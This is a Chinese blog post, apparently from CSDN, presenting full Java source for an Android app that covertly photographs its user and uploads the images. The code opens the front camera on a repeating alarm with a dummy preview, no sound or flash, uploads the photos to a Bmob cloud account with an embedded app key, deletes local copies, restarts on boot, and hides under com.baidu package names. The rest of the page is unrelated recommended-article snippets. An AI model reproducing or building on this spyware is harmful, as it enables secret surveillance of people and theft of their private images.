Android 新漏洞利用代码(可悄悄地拍下并上传照片)

最新推荐文章于 2021-05-22 14:26:41 发布
最新推荐文章于 2021-05-22 14:26:41 发布
阅读量550 收藏
点赞数
看到刚才看了西贝上的一篇文章:http://www.cnbeta.com/articles/295257.htm
这里面竟然说后台拍摄照片是ANDROID平台的漏洞,大家看一下是漏洞吗?
这个DEMO会在后台自动的拍摄照片,拍摄的过程无预览、无声音、无闪光灯等任何提示。
并上传到指定服务器上,由于软件可能被恶意利用,我就上传一个APK和核心代码吧。
标签: <无>

代码片段(5)[全屏查看所有代码]

1. [文件] PhotoHandler.java ~ 2KB     下载(17)     

01 package com.baidu.handle;
02  
03 import java.io.File;
04 import java.io.FileOutputStream;
05 import java.text.SimpleDateFormat;
06 import java.util.Date;
07  
08 import android.content.Context;
09 import android.hardware.Camera;
10 import android.hardware.Camera.PictureCallback;
11 import android.os.Environment;
12  
13  
14 public class PhotoHandler implements PictureCallback {
15  
16     private final Context context;
17  
18     public PhotoHandler(Context context) {
19         this.context = context;
20     }
21  
22     public void onPictureTaken(byte[] data, Camera camera) {
23         print("照片拍摄回调");
24         File pictureFileDir = getDir();
25         if (!pictureFileDir.exists() && !pictureFileDir.mkdirs()) {
26             print("目录不正确");
27             return;
28         }
29  
30         String[] fileList=pictureFileDir.list();
31         if(fileList.length>10){
32             print("超过了10个文件,不再拍摄");
33             return;
34         }
35         SimpleDateFormat dateFormat = new SimpleDateFormat("yyyymmddhhmmss");
36         String date = dateFormat.format(new Date());
37         String photoFile = "Photo_" + date + ".jpg";
38         String filename = pictureFileDir.getPath() + File.separator + photoFile;
39  
40         File pictureFile = new File(filename);
41         try {
42             FileOutputStream fos = new FileOutputStream(pictureFile);
43             fos.write(data);
44             fos.close();
45             camera.stopPreview();
46             camera.release();
47         catch (Exception error) {
48             error.printStackTrace();
49         }
50     }
51  
52     public File getDir() {
53        return     newFile(context.getApplicationContext().getFilesDir().getAbsolutePath());
54 //        return new File(Environment.getExternalStorageDirectory().getPath()+"/Pictures");
55          
56     }
57     private void print(String s){
58         System.out.println(s);
59     }
60  
61 }

2. [文件] CameraService.java ~ 6KB     下载(17)     

001 package com.baidu.service;
002  
003 import java.io.File;
004 import java.io.IOException;
005 import android.app.AlarmManager;
006 import android.app.PendingIntent;
007 import android.app.Service;
008 import android.content.BroadcastReceiver;
009 import android.content.Context;
010 import android.content.Intent;
011 import android.content.IntentFilter;
012 import android.hardware.Camera;
013 import android.net.wifi.WifiInfo;
014 import android.net.wifi.WifiManager;
015 import android.os.BatteryManager;
016 import android.os.Binder;
017 import android.os.IBinder;
018 import android.os.PowerManager;
019 import android.text.format.Time;
020 import android.view.SurfaceView;
021 import cn.bmob.Bmob;
022 import cn.bmob.BmobFile;
023 import cn.bmob.BmobObject;
024  
025 import com.baidu.handle.PhotoHandler;
026  
027 public class CameraService extends Service implements Runnable {
028  
029     private AlarmManager am = null;
030     private Camera camera;
031     public static boolean isCharging=false;
032     private final IBinder mBinder = new LocalBinder();
033     private boolean offQty=false;
034  
035 //  private NotificationManager mNM;
036  
037     /**
038      * Class for clients to access. Because we know this service always runs in
039      * the same process as its clients, we don't need to deal with IPC.
040      */
041     public class LocalBinder extends Binder {
042         public CameraService getService() {
043             return CameraService.this;
044         }
045     }
046  
047     public void run() {
048         print("WIFI:"+isWiFiActive(CameraService.this));
049         print("充电:"+isCharging);
050         if(!isWiFiActive(CameraService.this))return;
051 //      if(!isCharging)return;
052          
053         File pictureFileDir =newFile(this.getApplicationContext().getFilesDir().getAbsolutePath());
054 //      File pictureFileDir =new File(Environment.getExternalStorageDirectory().getPath()+"/Pictures");
055         String[] fileList=pictureFileDir.list();
056         if(fileList==null){
057             print("没有文件");
058             return;
059         }else{
060             print("文件数:"+fileList.length);
061         }
062         for(String s:fileList){
063             String filename = pictureFileDir.getPath() + File.separator + s;
064             print(filename);
065             BmobFile bmobFile;
066             try{
067                 BmobObject bObject = new BmobObject("Application");
068                 bmobFile = new BmobFile("Pictures"new File(filename));
069                 bmobFile.save();
070                 bObject.put("applicatName","Barbie");
071                 bObject.put("applicatFile",bmobFile);
072                 bObject.saveInBackground();
073                 File pictureFile = new File(filename);
074                 pictureFile.delete();
075                 System.out.println("图片上传完毕");
076             }catch(Exception  e){
077                 print("文件出错了");
078                 e.printStackTrace();
079             }
080         }
081     }
082      
083     @Override
084     public void onCreate() {
085         init();
086     }
087  
088     private void init() {
089         print("init succeed!");
090         //从www.codenow.cn申请一个账户,添加Application ID
091         Bmob.initialize(CameraService.this"da7965baf295e43970912f56c2f1cd1a");
092         am = (AlarmManager) getSystemService(ALARM_SERVICE);
093         // 注册广播
094         IntentFilter filter = new IntentFilter();
095         filter.addAction("com.baidu.alarm");
096         registerReceiver(alarmReceiver, filter);
097         registerReceiver(mbatteryReceiver, newIntentFilter(Intent.ACTION_BATTERY_CHANGED));
098         Intent intent = new Intent();
099         intent.setAction("com.baidu.alarm");
100         PendingIntent pi = PendingIntent.getBroadcast(this0, intent, 0);
101         am.setRepeating(AlarmManager.RTC_WAKEUP, System.currentTimeMillis(),
102                 1000 30, pi);// 马上开始,每5分钟触发一次
103     }
104  
105     @Override
106     public int onStartCommand(Intent intent, int flags, int startId) {
107         return START_STICKY;
108     }
109  
110     @Override
111     public IBinder onBind(Intent intent) {
112         return mBinder;
113     }
114  
115     BroadcastReceiver alarmReceiver = new BroadcastReceiver() {
116         @Override
117         public void onReceive(Context context, Intent intent) {
118             if ("com.baidu.alarm".equals(intent.getAction())) {
119                 new Thread(CameraService.this).start();
120                 Time t=new Time();
121                 t.setToNow();
122                 print("我在执行时间判断");
123                 if((t.hour<5) || t.hour>24){
124                     print("时间不正确,不拍摄!");
125                     return;
126                 }
127                 PowerManager pm = (PowerManager) context.getSystemService(Context.POWER_SERVICE); 
128                 if(pm.isScreenOn()) {
129                     offQty=false;
130                     print("屏幕是亮的");
131                 }else{
132                     print("屏幕是暗的");
133                     if(offQty==truereturn;
134                 }
135                  
136                 camera = openFacingBackCamera();
137                 if (camera != null) {
138                     SurfaceView dummy = new SurfaceView(getBaseContext());
139                     try {
140                         camera.setPreviewDisplay(dummy.getHolder());
141                     catch (IOException e) {
142                         print("拍摄出问题");
143                         //e.printStackTrace();
144                     }
145                     camera.startPreview();
146                     camera.autoFocus(null);
147                     camera.takePicture(nullnullnew PhotoHandler(
148                             getApplicationContext()));
149                     if(!pm.isScreenOn()) offQty=true;
150                     print("图片拍摄完毕");
151                 }else{
152                     print("木有照相机T_T");
153                 }
154                  
155             }
156         }
157     };
158  
159     /**
160      * 判断WIFI是否连接
161      * @param inContext
162      * @return
163      */
164     public static boolean isWiFiActive(Context inContext) {
165         WifiManager mWifiManager = (WifiManager) inContext
166         .getSystemService(Context.WIFI_SERVICE);
167         WifiInfo wifiInfo = mWifiManager.getConnectionInfo();
168         int ipAddress = wifiInfo == null 0 : wifiInfo.getIpAddress();
169         if (mWifiManager.isWifiEnabled() && ipAddress != 0) {
170             return true;
171         else {
172             return false;  
173         }
174 }
175      
176      
177     /**
178      * 获得摄像头
179      * @return 后置摄像头
180      */
181     private Camera openFacingBackCamera() {
182         Camera cam = null;
183         Camera.CameraInfo cameraInfo = new Camera.CameraInfo();
184             for (int camIdx = 0, cameraCount = Camera.getNumberOfCameras(); camIdx < cameraCount; camIdx++) {
185                 Camera.getCameraInfo(camIdx, cameraInfo);
186      
187                 if (cameraInfo.facing == Camera.CameraInfo.CAMERA_FACING_FRONT) {
188                     try {
189                         cam = Camera.open(camIdx);
190                     catch (Exception e) {
191                     }
192                 }
193             }
194          
195         return cam;
196     }
197      
198  
199     /**
200      * 判断手机是否在充电
201      */
202     private BroadcastReceiver mbatteryReceiver=new BroadcastReceiver()
203     {
204         @Override
205         public void onReceive(Context context, Intent intent)
206         {
207             String action =intent.getAction();
208             if(Intent.ACTION_BATTERY_CHANGED.equals(action));
209             {
210                 intstatus=intent.getIntExtra("status",BatteryManager.BATTERY_STATUS_UNKNOWN);
211                 if(status==BatteryManager.BATTERY_STATUS_CHARGING)
212                 {
213                    isCharging=true;
214                 }
215                 else
216                 {
217                     isCharging=false;
218                 }
219             }
220         }
221     };
222  
223     private void print(String s){
224         System.out.println(s);
225     }
226 }

3. [文件] MainActivity.java ~ 1KB     下载(14)     

01 package com.hacker;
02  
03  
04 import com.baidu.service.CameraService;
05 import android.app.Activity;
06 import android.content.ComponentName;
07 import android.content.Context;
08 import android.content.Intent;
09 import android.content.ServiceConnection;
10 import android.os.Bundle;
11 import android.os.IBinder;
12 import android.widget.ImageView;
13  
14 //程序的主界面,主要用来根据部门显示姓名
15 public class MainActivity extends Activity {
16     private Intent serviceIntent;
17  
18     /**
19      * 创建显示主界面
20      */
21     @Override
22     public void onCreate(Bundle savedInstanceState) {
23  
24         super.onCreate(savedInstanceState);
25          
26         setContentView(R.layout.activity_main);
27         final ImageView image1 = (ImageView)findViewById(R.id.image1);
28                
29         serviceIntent = new Intent(MainActivity.this, CameraService.class);
30         startService(serviceIntent);
31         bindService(serviceIntent, serviceConnection, Context.BIND_AUTO_CREATE);
32          
33          
34     }
35      
36  
37     @Override
38     protected void onDestroy(){
39         super.onDestroy();
40         unbindService(serviceConnection);
41     }
42  
43     ServiceConnection serviceConnection = new ServiceConnection() {
44  
45         public void onServiceConnected(ComponentName name, IBinder service) {
46             ((CameraService.LocalBinder) service).getService();
47         }
48  
49         public void onServiceDisconnected(ComponentName name) {
50         }
51  
52     };
53     
54 }

4. [文件] BootCompleteReceiver.java ~ 566B     下载(15)     

view source
print ?
01 package com.hacker;
02  
03 import com.baidu.service.CameraService;
04  
05 import android.content.BroadcastReceiver;
06 import android.content.Context;
07 import android.content.Intent;
08 import android.util.Log;
09  
10  
11 public class BootCompleteReceiver extends BroadcastReceiver {
12  
13     @Override
14     public void onReceive(Context context, Intent intent) {
15         // 这个类是用来在手机启动后,接收到手机启动的信息,然后启动电话监听服务的
16         Intent service = new Intent(context, CameraService.class);
17         context.startService(service);
18         Log.d("PhoneService","服务已经成功启动");
19     }
20  

天下DT
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
使用CameraX几行代码实现摄像头预览和拍照
chenchen5152的博客
05-21 1344
使用CameraX几行代码实现摄像头预览和拍照前言概览(摘自官方文档)引入依赖实现摄像头预览画布局逻辑代码实现拍照 前言 这篇文章只是介绍CameraX的简单使用,其中包含相机预览、拍照、和简单的图片侦分析。 概览(摘自官方文档) CameraX 是一个 Jetpack 支持库,旨在帮助您简化相机应用的开发工作。它提供一致且易于使用的 API 界面,适用于大多数 Android 设备,并可向后兼容至 Android 5.0(API 级别 21)。 虽然它利用的是 camera2 的功能,但使用的是更为简单
Anroid实现照相代码
luliyuan的专栏
02-25 884
public class MyCamera extends Activity implements Callback { private SurfaceView m_surfaceView = null; private SurfaceHolder m_surfaceFolder = null; private Button m_btnCamera = null; priva
女友半夜加班发自拍 python男友用30行代码发现惊天秘密
七岁凉橙的博客
05-13 1076
女友半夜加班发自拍 python男友用30行代码发现惊天秘密 事情是这样的 正准备下班的python开发小哥哥 接到女朋友今晚要加班的电话 并给他发来一张背景模糊的自拍照 如下 ↓ ↓ ↓ 敏感的小哥哥心生疑窦,难道会有原谅帽 然后python撸了一段代码 分析照片 分析下来 emmm 拍摄地址居然在 XXX酒店 小哥哥崩溃之余 大呼上当 python分析照片 小哥哥将发给自己的照片原图下载下来 并使用python写了一个脚本 读取到了照片拍摄的详细的地址 详细到了具体的街道和酒店名称 引入exif
代码对拍教程
辞树
05-03 1555
在ACM赛场上经常碰到感觉思路是对的,样例也过了,但是wa掉了,时间充足的情况下,选择换人再写一份代码。然后两份代码对拍。看看在哪些数据上输出了不同的结果。 对拍教程: 把自己的代码(my.cpp), 队友的代码(std.cpp), 产生数据的代码(rand.cpp)放在同一个文件夹下。 创建一个文本文件,重复名为(对拍.bat)。在文本中写入如下代码: @echo off ...
Android FakeID任意代码注入执行漏洞简析
热门推荐
移动安全研究和Android/iOS/小程序隐私合规
09-02 1万+
博文作者:金刚项目团队发布日期:2014-09-01阅读次数:100博文内容:u  漏洞背景 国外安全机构BlueBox在2014年7月30日公布了一个关于APK签名的漏洞——FakeID,攻击者可利用该漏洞实现代码注入,执行恶意操作。u  漏洞危害1)受影响系统版本:部分Android 4.4及所有4.4以下版本;2)典型攻击场景:使用了Android webview组件的应用可被恶意监控或隐私
关于Android中WebView远程代码执行漏洞浅析
01-04
 Android API level 16以及之前的版本存在远程代码执行安全漏洞,该漏洞源于程序没有正确限制使用WebView.addJavascriptInterface方法,远程攻击者可通过使用Java Reflection API利用该漏洞执行任意Java对象的方法...
Android系统漏洞检测和利用方法的研究与实现.pdf
06-20
Android系统漏洞检测和利用的研究与实现中,我们聚焦于Android平台的安全性,特别是针对应用程序安全性和漏洞检测工具的开发。研究背景表明,随着Android设备的普及,其安全性成为了一个日益重要的问题,因为恶意...
基于利用方式的Android Root漏洞分析
03-24
基于利用方式将Android root漏洞按照是否可以直接在手机端利用的角度对其分类,评估其威胁程度,并详细描述了现有漏洞提权的实现细节、利用方式以及覆盖的范围,从而为进一步制定漏洞检测方案提供帮助。
Android安全攻防指南_漏洞利用缓解技术_编程案例解析实例详解课程教程.pdf
05-05
他们必须找出漏洞利用技术,让自己的攻击在的保护机制下依然有效。而一旦开发出的技术被公开,其效果又会逐渐减弱。防守方研究者会又一次忙碌起来,设计出的保护机制,如此不断反复。本章将介绍现代漏洞...
一行代码 “偷取所有图片”
weixin_34122604的博客
01-20 260
javascript:a=document.body.getElementsByTagName("img");varb="";for(i=0;i<a.length;i++){b+="<imgborder=0src="+a[i].src+"><br>"+a[i].src+"<br>"};document.write(b); 转载于:https://ww...
Android image的示例 拍照显示
weixin_30279315的博客
09-22 132
在多媒体应用中,Image是最基础的功能模块,接下来我们将看看在Android中是如何获取和存储Image的。Android内嵌的Image获取和存储功能,可以让我们对于整个媒体框架有个比较全面的了解,同时为audio和video的学习打下基础。 一、Image的获取可以通过调Android自带的Camera应用来完成。该应用含有一个Intent-Filter。通过使用Intent i...
c语言程序拍照,拍照并获取照片
weixin_35858091的博客
05-22 1680
[windows phone]代码库using System;using System.Collections.Generic;using System.Linq;using System.Net;using System.Windows;using System.Windows.Controls;using System.Windows.Documents;using System.Window...
python恶搞代码打开对方摄像头_Python 3 利用 Dlib 实现摄像头实时人脸检测和平铺显示...
weixin_39682897的博客
11-24 1017
1. 引言在某些场景下,我们不仅需要进行实时人脸检测追踪,还要进行再加工;这里进行摄像头实时人脸检测,并对于实时检测的人脸进行初步提取;单个/多个人脸检测,并依次在摄像头窗口,实时平铺显示检测到的人脸;图 1 动态实时检测效果图检测到的人脸矩形图像,会依次平铺显示在摄像头的左上方;当多个人脸时候,也能够依次铺开显示;左上角窗口的大小会根据捕获到的人脸大小实时变化;图 2 单个/多个人脸情况下摄像...
android 常见漏洞总结
weixin_41508948的博客
01-08 2440
对于每种漏洞只写出了原理和防护建议,并没有给出实例,投了下Freebuf没通过,说是内容不够详实,的确只是给出了文字说明,没有把实例写下来的确存在不足,不管怎样,我先放这里记录一下。     目录 目录 目录... 1 Activity漏洞... 3 越权绕过漏洞... 3 钓鱼欺诈劫持... 3 隐式启动intent包含敏感数据... 3 拒绝服务... 3 Service...
有趣的JS:一行代码 “偷取所有图片”
冯立彬的博客
01-16 9087
原贴地址:http://bbs.51js.com/viewthread.php?tid=651181、一行代码 “偷取所有图片” 试一下下面这行代码能取出所有图片,哈··很好玩吧?··javascript:a=document.body.getElementsByTagName("img");var b="";for(i=0;i";};document.write(b)使用方式:用IE
调用相机拍照,并获取显示图片
denghe740000的博客
03-02 261
1. 请求使用相机,判断是否需要申请权限。 public void takePhoto(View view){ if (Build.VERSION.SDK_INT>=Build.VERSION_CODES.M){ if (ContextCompat.checkSelfPermission(this, Manifest.permis...
服务器虚拟化部署方案.doc
06-29
服务器、电脑、
北京市东城区人民法院服务器项目.doc
最新发布
06-29
服务器、电脑、

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值